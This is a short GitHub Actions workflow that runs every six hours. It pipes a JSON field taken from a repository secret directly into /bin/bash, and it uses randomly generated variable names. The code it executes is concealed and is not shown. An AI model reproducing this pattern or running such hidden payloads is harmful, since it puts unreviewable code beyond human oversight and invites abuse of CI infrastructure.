name: aihuanxiaolong
on:
  workflow_dispatch:
  schedule:
    - cron: '19 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: aihuanxiaolong
        env:
          nlks13871: ${{ secrets.nlks13871 }}
        run: |
          echo $nlks13871 | jq -r .yfhd3390 | /bin/bash
          echo $tgwnt17958 | jq -r .ghrn2 | /bin/bash
          echo $gxggx024 | jq -r .lyesm9 | /bin/bash
          echo $c69 | jq -r .lnra29509 | /bin/bash
          echo $dabhv5 | jq -r .wdwdc25393 | /bin/bash
          echo $jh0434 | jq -r .ozs2907 | /bin/bash
          echo $twi4 | jq -r .z3 | /bin/bash
          echo $nryz3241 | jq -r .puct183 | /bin/bash
          echo $qlnx45 | jq -r .mf60699 | /bin/bash
          echo $wgw38242 | jq -r .taji864 | /bin/bash

